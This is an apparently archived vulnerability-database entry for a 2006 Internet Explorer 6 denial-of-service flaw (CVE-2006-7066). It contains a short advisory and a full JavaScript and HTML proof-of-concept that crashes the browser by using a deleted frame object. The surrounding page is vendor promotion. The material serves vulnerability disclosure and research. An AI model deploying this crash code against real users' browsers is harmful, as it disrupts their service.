Lucene search
+L

Microsoft Internet Explorer 6 - Deleted Frame Object Denial of Service

🗓️ 29 Jul 2006 00:00:00Reported by hdmType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 22 Views

Microsoft Internet Explorer 6 Denied Service via Deleted Frame Objec

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-7066
27 Feb 200718:00
cve
cvelist
Cvelist
CVE-2006-7066
27 Feb 200718:00
cvelist
nvd
NVD
CVE-2006-7066
2 Mar 200721:18
nvd
nessus
Tenable Nessus
MS06-042: Cumulative Security Update for Internet Explorer (918899)
8 Aug 200600:00
nessus
source: https://www.securityfocus.com/bid/19228/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability. This issue is triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

// MoBB Demo
			// Provided by Aviv Raff
			// http://aviv.raffon.net/

            var orphanObject;

            function createOrphanObject() {
                orphanObject=document.frames["emptyFrame"].document.getElementById("emptyObject").object.parentWindow.document.createElement("frame");
                document.frames["emptyFrame"].location.href="about:blank";
                window.setTimeout('crashBrowser()',1);
            }

            function crashBrowser() {
                orphanObject.frameBorder="whateveryoulike";
            }

            function insertEmptyObject() {
                return '<OBJECT id="emptyObject" data="nonexist.html" type="text/html"></OBJECT>';
            }


        <iframe id="emptyFrame" src="javascript:parent.insertEmptyObject()" style="display:none"></iframe>

        Clicking the button below may crash your browser!<br><br>
        <input type='button' onClick='createOrphanObject()' value='Start Demo!'>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Sep 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.1
EPSS0.21601
22